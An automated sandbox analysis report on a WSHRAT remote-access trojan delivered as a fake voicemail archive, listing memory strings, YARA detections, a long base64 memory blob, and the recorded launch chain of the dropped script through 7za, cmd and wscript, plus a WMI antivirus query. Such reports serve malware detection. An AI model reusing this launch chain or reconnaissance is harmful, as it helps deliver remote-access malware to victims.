Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bpgpnhpkp	memstr_5556195f-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uhpkp	memstr_cb03db88-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dlpsp,(	memstr_14a4f69f-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rpyp	memstr_993806fd-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zpfp	memstr_7cb0ee1f-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'rpfp	memstr_600b5858-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gpnpdf	memstr_f81e41cf-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: opqp	memstr_0f245f53-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'gprp	memstr_70c00180-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rpsp@8	memstr_1681f3ac-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &rpsp	memstr_2435e971-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tpup	memstr_95566433-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vpzp	memstr_b24061ed-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'tpzp\|!	memstr_99ae8a49-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p~'{p	memstr_a90a1f04-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p3qp$	memstr_bba48b73-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q#q	memstr_53a4d33f-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %q,qdf	memstr_8bfa83ea-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -q0q	memstr_647d7891-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '%q1q&	memstr_307b9a28-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1q2qh^	memstr_ec81f444-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q1q	memstr_c5c5b2cb-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &q2q	memstr_b2203e0a-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j4qfq	memstr_034fd838-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7q8q	memstr_98aaa4ab-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9q?q	memstr_71e80f13-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '7q?q	memstr_76d56354-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bqeq	memstr_c4c266e3-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7qeq'	memstr_cc01dd49-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ngqjql'	memstr_3a21459c-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ugqjqp'	memstr_720b96d5-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dkqsq	memstr_7cfc378e-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qqxq	memstr_87d2184b-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: yqeq	memstr_a7df0b43-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'qqeql(	memstr_dd0cd671-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fqmqdf	memstr_a2d48571-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nqqq	memstr_9928dcd6-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'fqrq	memstr_d6955108-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rqsq$\	memstr_25e2f6ce-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &qqsqt(	memstr_02b800c4-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tquq\	memstr_a34ded51-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vqzql\	memstr_0b443b91-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'tqzq	memstr_24579d0b-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|q}q	memstr_f7b8529e-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (tq}q,)	memstr_9d7c596d-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ckq}q,(	memstr_cb74fe70-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pfqp$	memstr_27093944-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrxi	memstr_2db5b0e7-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrh-	memstr_f71954eb-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r!rl]	memstr_d3de79a2-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "r,r	memstr_316a8969-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .r5rdf	memstr_24954d26-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6r9r	memstr_6ab10f06-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '.r:r	memstr_1e0a4179-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :r;rh^	memstr_7e99db14-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "r:r	memstr_ae85907a-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;rbrtd	memstr_de03fadb-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c"rbr	memstr_d7ab3e2d-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rcrt.	memstr_2d0713d2-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: drer\	memstr_60038332-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: grnr	memstr_e3e31a92-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: or[r	memstr_a9af42cc-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'gr[rp/	memstr_0ed824c0-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \rcrdf	memstr_9c47c622-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: drgr	memstr_119fcb8a-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '\rhr	memstr_d3afbb84-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hrir$\	memstr_8b009fe0-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &grir	memstr_a373f202-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (drir\/	memstr_8c6fdabf-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rir@/	memstr_e1b0ad73-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jrkr\	memstr_58f6efe1-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lrprl\	memstr_b5eff159-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'jrpr`0	memstr_487c65ad-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rrsr	memstr_77c2150c-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (jrsr	memstr_ed27d2f5-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cdrsr(0	memstr_0b408953-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trur\	memstr_5d3021b8-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vrzrx\	memstr_58312e78-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'trzr	memstr_2917ab7c-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &tr\|r	memstr_d9293832-a

Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\2otik2vy.ast" "C:\Users\user\Downloads\New Voicemail May 9 _mp4.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js"	Jump to behavior

Source: C:\Windows\SysWOW64\unarchiver.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661089635.0000000003605000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct

Stealing of Sensitive Information

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000003.2053554395.0000000003517000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092992601.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2197255789.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443802427.000002101330E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662166348.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662453793.00000210132F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092554619.0000000005A54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2094186218.000000000573C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443649511.00000210131BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047460205.0000000005727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662373093.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444885075.00000210130B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662263359.00000210131BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3663724443.000002101409B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092891218.0000000005B96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3661879810.0000021012F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2044961577.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661927957.000000000562A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2093146388.00000000055ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7za.exe PID: 2936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 1544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED

Remote Access Functionality

Yara detected WSHRAT

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000003.2053554395.0000000003517000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2093975107.00000000038A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092992601.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2197255789.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443802427.000002101330E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2776254293.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662166348.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2252696295.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662453793.00000210132F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2039075098.0000000000E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092554619.0000000005A54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2094186218.000000000573C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2443649511.00000210131BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047460205.0000000005727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662373093.0000000005AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2365561540.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444885075.00000210130B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662263359.00000210131BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3283310659.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3663724443.000002101409B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092891218.0000000005B96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3228165832.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2122982130.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2091678833.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3661879810.0000021012F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2195388309.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3664293608.0000000006F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3338153980.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2089734091.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2309211314.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2044961577.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3661927957.000000000562A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2093146388.00000000055ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2479670966.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.3408776876.0000000006F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7za.exe PID: 2936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 1544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: wscript.exe, 0000000B.00000003.2051408699.0000000005915000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UafTvI2ibB1WipFtQ0WqMxfVDbjPYIKCE6qj0HbX8s6U9K+FPtKS1Mr2o8yhuy13uSHtYZtknYrT/FGmQ7KeF+Cb+gs/xjEr4g4UkJ35SwwxCGRhdJuNW4NfAwjRicAxww2OZbAInKeVI5EpbRani3jK0FVoO2Io/9LcDmAVMpCPbl8m4KIj9gbI+PzScB7Gq6HpiGC4Gxm3wsSrXA+GjoALZIYndKLASsm84WMcDt4nzAgrgY8AtiCy2mg8rtkH9eeQfwJQl/ofwGduiB31TaTyinAZ+W8D2G9cdVBYNzLyF7CXpLwnDgHRrkBIa0lknYJGhkGrZfYmaLKZqB3SmxqNEiFgB7yMfWiTiwZ3xsTKwC9pqP3Sg2AgssZmyz8rRIAVvqY8+L/fDlWoldT/8mssCu9Hm/EAeBFSRm0q/FEWD3LPbWpkGZgNe/tXjKzgB9X2KqEVeOAjPOqubFJNZENyn3Avuxj92rHCfvBXGCzNgjyoNy73hYm/oYNVSwbmBNFWwLsJYKdiWwtgqWV7/rv1Uy9nn1R7S4gn1VfdF/gWPscfWfKV7BnlVfp/Np6RLPspfUf8cr3MQSb+5vAlsh5/2cYFirTMGjCu/uOxTe53dJyv2S8hdVlCck5WlJeV6+Yb+k8JnxqkIyXjjffUvhzPY9hc8QTeUzop6TBymvUOdHaKsk3wPocyqPdWwW97jkTkju5z6CHkGvqCzzqpR5XcpUz/e4pL+qePQa4kjYAKiJywEbxSclxZQwKeFSCZdLuFLCtT6dY2q5hCslXCthRnIPSjgOuF9cR7cGHxatxFHeShzdy+ivgydA4Wi+g74XfBZtlr8b8FXRJ/fyNvpV8CjgfwZTyjbJ/RJgUfkKXapdq3yNdmo3KH9LtnYLKNdrtymP05e0PwL8mtZMP6Nfaw8qv6Kg/jB2c6P+Dj0lNSyjc/VHlRqxVv87cHv1v8fm79X/ATKX6T9Ce1h/QWkVef1FtI/oP5Myv1Reoev0twBv16FB8Iy6AZeqGwA71csBV6lJwLXqQSFnDdirxmgJ9YhldJSuFgn6J1FQE/DA5YBPiq3qeuoBdz2k60SvDxfQAtEP+aNir+ybkpSU5GZAz4kJ2et6Sb8eZwO3rwG8Bdw/E/dJ7p/T0/QGIPc6ISlPyvaT9CYdUU5Kyr/IXkidQCfBFFUwJSYpMUlZ70Om7JXtvbI9Idv3SXjCh0w/KdukSJ0Kt9tphWpgL42r3j1RQ+Wbdlh8UlwlUuJR8S3xPfGM+Kl4RWSUu5X7l